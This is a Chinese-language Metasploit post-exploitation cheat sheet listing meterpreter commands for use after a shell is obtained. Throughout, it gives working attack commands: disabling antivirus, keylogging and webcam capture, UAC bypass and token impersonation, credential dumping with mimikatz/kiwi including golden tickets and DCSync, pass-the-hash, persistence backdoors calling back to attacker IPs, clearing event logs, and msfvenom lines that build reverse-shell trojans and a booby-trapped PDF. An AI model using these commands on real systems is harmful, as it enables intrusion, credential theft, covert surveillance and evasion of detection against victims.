获取shell后各种命令及操作

1 、获取目标分区情况

run post/windows/gather/forensics/enum_drives

2 、检测是否是虚拟主机

run post/windows/gather/checkvm

3 、获取当前安装的应用程序

run post/windows/gather/enum_applications

4 、获取用户登录信息

run post/windows/gather/enum_logged_on_users

5 、收集系统环境信息

run post/multi/gather/env

6 、查看开启的服务

run post/windows/gather/enum_services

7 、查看目标主机最近的操作

run post/windows/gather/dumplinks

8 、其他操作

删除用户

run post/wndows/manage/delete_user username=aiyou

添加账户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou 关闭杀软

windows/manage/killav

9 、查看目标机安装了哪些应用、补丁

run post/windows/gather/enum_applications

10 、对目标进行漏洞扫描 ( 提权操作 )

run post/multi/recon/local_exploit_suggester

执行之后给了我们很多 exploit

我们就随便挑几个

exploit/windows/local/ms16_014_wmi_recv_notif 这个提权成功

hashdump

hashdump 是查询密码 hash ： 因为有时候你得搜集密码来进⾏爆破别的⽤户

信息收集：

run post/windows/gather/checkvm # 是否虚拟机

run post/linux/gather/checkvm # 是否虚拟机

run post/windows/gather/forensics/enum_drives # 查看分区

run post/windows/gather/enum_applications # 获取安装软件信息

run post/windows/gather/dumplinks # 获取最近的文件操作

run post/windows/gather/enum_ie # 获取 IE 缓存

run post/windows/gather/enum_chrome # 获取 Chrome 缓存

run post/windows/gather/enum_patches # 补丁信息

run post/windows/gather/enum_domain # 查找域控

msf 之键盘记录、屏幕截图、文件操作、 load 扩展等

键盘记录

先是获取到了一个 Meterpreter ，他有这些功能 keyscan_start 开启键盘监听后，再用 keyscan_dump 进行记录的导出，如果不想监听了才

keyscan_stop 。而不是先 keyscan_stop 再 keyscan_dump

keyscan_start 启动键盘记录监听

目标机器输入东西的话，就可以获取到键盘记录 keyscan_dump

成功获取到键盘记录！

< Left Windows >< CR > 是回车键

keyboard_send 输入东西到目标机器上

假设目标机器上有鼠标指针，那么说明可以输入内容，那我们就可以使用 keyboard_send 来输入东西到

目标主机上

目标目前是空的： 这个时候，目标的记事本里就多出了一些内容，就是我们刚刚输入的 hacker_hhhhh

文件操作

操作文件系统

1. 文件的基本操作

　　 ls ：列出当前路径下的所有文件和文件夹。

　　 pwd 或 getwd ：查看当前路径。

　　 search ：搜索文件，使用 search -h 查看帮助。

　　 cat ：查看文件内容，比如 cat test.txt 。

　　 edit ：编辑或者创建文件。和 Linux 系统的 vm 命令类似，同样适用于目标系统是 windows 的情况。

　　 rm ：删除文件。

　　 cd ：切换路径。

　　 mkdir ：创建文件夹。

　　 rmdir ：删除文件夹。

　　 getlwd 或 lpwd ：查看自己系统的当前路径。

　　 lcd ：切换自己当前系统的目录。

　　 lls ：显示自己当前系统的所有文件和文件夹。

getwd 查看目标当前目录

2. 文件的上传和下载

　　 (1) upload

　　格式： upload 本地文件路径目标文件路径

(2)download

　　格式： download 目标文件路径 本地文件路径

load 扩展

load 可以加载这些： load -l

其实还可以加载 python 等等

load python 加载 python

加载扩展后，我们可以使用基本的 Python 函数，例如 print 。这可以通过使用 python_execute 命令和标

准 Python 语法来实现。 还可以保存到变量，并使用 -r 开关打印其内容。

运行 python 文件 ： python_import -f /root/liuwx.py

这个好处是，无需对方系统有 python 环境，就可以运行 python 脚本 ~ 当然，也可以上传很多扩展，比

如 powershell 等等

系统其它操作

1. 关闭防病毒软件

　　 run killav

　　 run post/windows/manage/killav

2. 操作远程桌面

　　 run post/windows/manage/enable_rdp 开启远程桌面

　　 run post/windows/manage/enable_rdp username=test password=test 添加远程桌面的用

户 ( 同时也会将该用户添加到管理员组 )

3. 截屏

　　 screenshot

4. 键盘记录

　　 keyscan_start ：开启键盘记录功能

　　 keyscan_dump ：显示捕捉到的键盘记录信息

　　 keyscan_stop ：停止键盘记录功能

5. 执行程序

　　 execute -h 查看使用方法

　　 -H ：创建一个隐藏进程

　　 -a ：传递给命令的参数

　　 -i ：跟进程进行交互

　　 -m ：从内存中执行　　 -t ：使用当前伪造的线程令牌运行进程

　　 -s ：在给定会话中执行进程

　　例： execute -f c:/temp/hello.exe

端口转发和内网代理

1.portfwd

　　 portfwd 是 meterpreter 提供的端口转发功能，在 meterpreter 下使用 portfwd -h 命令查看该命令的

参数。

常用参数：

　　 -l ：本地监听端口

　　 -r ：内网目标的 ip

　　 -p ：内网目标的端口

上面命令执行之后，会将 10.1.1.3 的 3389 端口转发到本地的 2222 端口。 2.pivot

　　 pivot 是 msf 最常用的代理，可以让我们使用 msf 提供的扫描模块对内网进行探测。

(1) 首先需要在 msf 的操作界面下添加一个路由表。

　　添加命令： route add 内网 ip 子网掩码 session 的 id

　　打印命令： route print

路由添加成功之后就可以在 msf 里访问 10.1.1.0/24 这个网段。

(2) 建立 socks 代理。

　　如果其它程序需要访问这个内网环境，就可以建立 socks 代理。

　　 msf 提供了 3 个模块用来做 socks 代理。

　　 auxiliary/server/socks4a

　　 use auxiliary/server/socks5

　　 use auxiliary/server/socks_unc

　　以 auxiliary/server/socks4a 为例，查看需要设置的参数。

一共两个参数：

　　 SRVHOST ：监听的 ip 地址，默认为 0.0.0.0 ，一般不需要更改。

　　 SRVPORT ：监听的端口，默认为 1080 。

　　直接运行 run 命令，就可以成功创建一个 socks4 代理隧道，在 linux 上可以配置 proxychains 使           用，

       在windows 可以配置 Proxifier 进行使用。

msf 之常用命令

基础命令

加载模块 use name

查看网络配置 ifconfig

获取进程列表 ps

查看所有 exploit show exploits

查看所有 payload show payloads

查看所有 auxiliary show auxiliary

展示模块详细信息 info

查找模块 search name

查看当前运行的模块 jobs

重启目标机器 reboot

关闭目标机器 shutdown

获取交互 shell shell

当前 meterpreter 到后台 background 离开 msf quit

端口转发

portfwd add -l 6666 -p 3389 -r 192.168.1.2

常用参数： -l ：本地监听端口 -r ：内网目标的 ip -p ：内网目标的端口

设置 Socks 代理

Socks4a 代理

use auxiliary/server/socks4a

set srvhost 127.0.0.1

set srvport 1080

run

添加路由

获取网段信息

run get_local_subnets

查看帮助

run autoroute –h

添加到目标环境网络

run autoroute -s 192.168.0.1/24

打印添加的路由

run autoroute –p

删除路由

run autoroute -d -s 192.168.0.1/24

execute 执行文件

在目标机中执行文件

execute

创建新进程 cmd.exe ， -H 不可见， -i 交互

execute -H -i -f cmd.exe

-f ：指定可执行文件

-H ：创建一个隐藏进程

-a ：传递给命令的参数

-i ：跟进程进行交互

-m ：从内存中执行

-t ： 使用当前伪造的线程令牌运行进程

-s ： 在给定会话中执行进程

migrate 转移进程

获取当前进程 PID getpid

获取进程列表 ps

转移进程 migrate PID

杀死进程 kill PID 自动进程迁移 run post/windows/manage/migrate

监听设置自动转移进程 set autorunscript migrate -f

令牌窃取

使用模块 use incognito

查看可用 token list_tokens -u

假冒 SYSTEM 权限 impersonate_token 'NT AUTHORITY\SYSTEM'

利用假冒身份执行命令 execute -f cmd.exe -i –t

或者直接 shell 即可

返回原始权限 rev2self

提权相关

加载特权提升扩展模块 use priv

获取更多的特权 getprivs

查看补丁信息 run post/windows/gather/enum_patches

可利用 exp 提权检测 use post/multi/recon/local_exploit_suggester

系统服务权限配置错误 use exploit/windows/local/service_permissions

注册表键配置错误提取 use exploit/windows/local/always_install_elevated

可信任服务路径 use exploit/windows/local/trusted_service_path

bypassuac

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection

use windows/local/bypassuac_vbs

use windows/local/ask

键盘鼠标设置

禁用鼠标 uictl disable mouse

禁用键盘 uictl disable keyboard

启用鼠标 uictl enable mouse

启用键盘 uictl enable keyboard

键盘记录

# 开始键盘记录

keyscan_start

# 导出记录数据

keyscan_dump

# 结束键盘记录 keyscan_stop

信息搜集

查看当前目录 pwd getwd

查看目标主机信息 sysinfo

检查目标机器闲置时间 idletime

获取代理信息

getproxy

查看目标主机是否运行在虚拟机上

run checkvm run post/windows/gather/checkvm

获取主机安装软件、补丁

run post/windows/gather/enum_applications

获取目标主机环境变量

run post/multi/gather/env

获取 IE 缓存

run post/windows/gather/enum_ie

获取 Chrome 缓存

run post/windows/gather/enum_chrome

获取 Firefox 缓存

run post/windows/gather/enum_firefox

列举当前登录的用户

run post/windows/gather/enum_logged_on_users

查找域控

run post/windows/gather/enum_domain

Windows 凭证搜索

run post/windows/gather/enum_unattend

获取办公文档

run post/windows/gather/dumplinks

获取目标常见信息并保存到本地 run scraper

屏幕截图

screenshot

密码获取

抓取自动登录的用户名和密码

run post/windows/gather/credentials/windows_autologin

hashdump run post/windows/gather/smart_hashdump

mimikatz

老版

加载 load mimikatz

获取 hash 值 msv

获取明文 Kerberos

获取系统账户信息 wdigest

新版

加载 kiwi 模块：

列举系统中的明文密码：

creds_all ： # 列举所有凭据

creds_kerberos ： # 列举所有 kerberos 凭据

creds_msv ： # 列举所有 msv 凭据

creds_ssp ： # 列举所有 ssp 凭据

creds_tspkg ： # 列举所有 tspkg 凭据

creds_wdigest ： # 列举所有 wdigest 凭据

dcsync ： # 通过 DCSync 检索用户帐户信息

dcsync_ntlm ： # 通过 DCSync 检索用户帐户 NTLM 散列、 SID 和 RID

golden_ticket_create ： # 创建黄金票据

kerberos_ticket_list ： # 列举 kerberos 票据

kerberos_ticket_purge ： # 清除 kerberos 票据

kerberos_ticket_use ： # 使用 kerberos 票据

kiwi_cmd ： # 执行 mimikatz 的命令，后面接 mimikatz.exe 的命令

lsa_dump_sam ： #dump 出 lsa 的 SAM

lsa_dump_secrets ： #dump 出 lsa 的密文

password_change ： # 修改密码

wifi_list ： # 列出当前用户的 wifi 配置文件

wifi_list_shared ： # 列出共享 wifi 配置文件 / 编码

kiwi_cmd 模块可以让我们使用 mimikatz 的全部功能，该命令后面接 mimikatz.exe 的命令 :

kiwi_cmd sekurlsa::logonpasswords

load kiwi

creds_all 获取域散列值

# 使用 psexec_ntdsgrab 模块

use auxiliary/admin/smb/psexec_ntdsgrab

set RHOST set SMBDomain

set SMBUser

set SMBPass

# 基于 meterpreter 会话

use windows/gather/credentials/domain_hashdump

set session ID

流量抓取

查看网卡信息

run packetrecorder -L

查看流量

run packetrecorder -i < 网卡 ID>

端口扫描、主机发现

使用 arp 发现主机

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24

扫描 tcp 端口

run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389 防火墙、杀软

关闭杀软 run killav

查看防火墙状态 run getcountermeasure

在 shell 中使用

netsh firewall show opmode

PowerShell

加载脚本模块

powershell_import /root/Desktop/HostRecon.ps1

执行加载的脚本

powershell_execute Invoke-HostRecon

Hash 传递

use exploit/windows/smb/psexec

摄像头、屏幕

查看摄像头信息 webcam_list

使用摄像头拍照 webcam_snap

屏幕监视 run vnc

开启远程桌面

开启远程桌面

run post/windows/manage/enable_rdp

添加用户

run post/windows/manage/enable_rdp USERNAME=gugugu PASSWORD=Root123456789

将 3389 端口转发到 6662 端口

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662

cmdshell 升级

查看全部会话 sessions

选择会话 1 sessions 1

升级 meterpreter sessions -u 会话 id

持久化控制后门

run persistence -X -i 50 -p 4444 -r 192.168.1.7

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.109.137

set LPORT 4444 exploit

针对 linux 平台

目标主机保存的 ssh 身份验证信息

run post/multi/gather/ssh_creds

擦屁股、清痕迹

删除添加的账号

C:\Windows\system32> net user 添加的用户名 /del

删除日志

clearev

关闭所有 session 连接

sessions -K

事件日志

查看事件日志

run event_manager -i

清除事件日志

run event_manager -c

msf 生成木马教程

生成木马命令： msfvenom

msfcenom 详细语法

-e, –encoder [encoder] 指定需要使用的 encoder （编码器）

-a, –arch < architecture> 指定 payload 的目标架构

–platform < platform> 指定 payload 的目标平台

-s, –space < length> 设定有效攻击荷载的最大长度

-b, –bad-chars < list> 设定规避字符集，比如 : & #039;\x00\xff& #039;

-i, –iterations < count> 指定 payload 的编码次数

-c, –add-code < path> 指定一个附加的 win32 shellcode 文件

-x, –template < path> 指定一个自定义的可执行文件作为模板

-k, –keep 保护模板程序的动作，注入的 payload 作为一个新的进程运行

–payload-options 列举 payload 的标准选项

-o, –out < path> 保存 payload

-v, –var-name < name> 指定一个自定义的变量，以确定输出格式

–shellest 最小化生成 payload

-h, –help 查看帮助选项

–help-formats 查看 msf 支持的输出格式列表

生成木马语句

二进制

linux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho web

php:msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php |

pbcopy && echo '<?php ’ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

asp:msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

jap:msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

war:msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

脚本

python:msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

bash:msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

perl:msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

基于 pdf 的 shellcode

use exploit/windows/fileformat/adobe_utilprintf

msf5 exploit(adobe_utilprintf)>set FILENAME BestComputers-UpgradeInstructions.pdfset

PAYLOAD windows/meterpreter/reverse_tcp

其他的就自己填就好了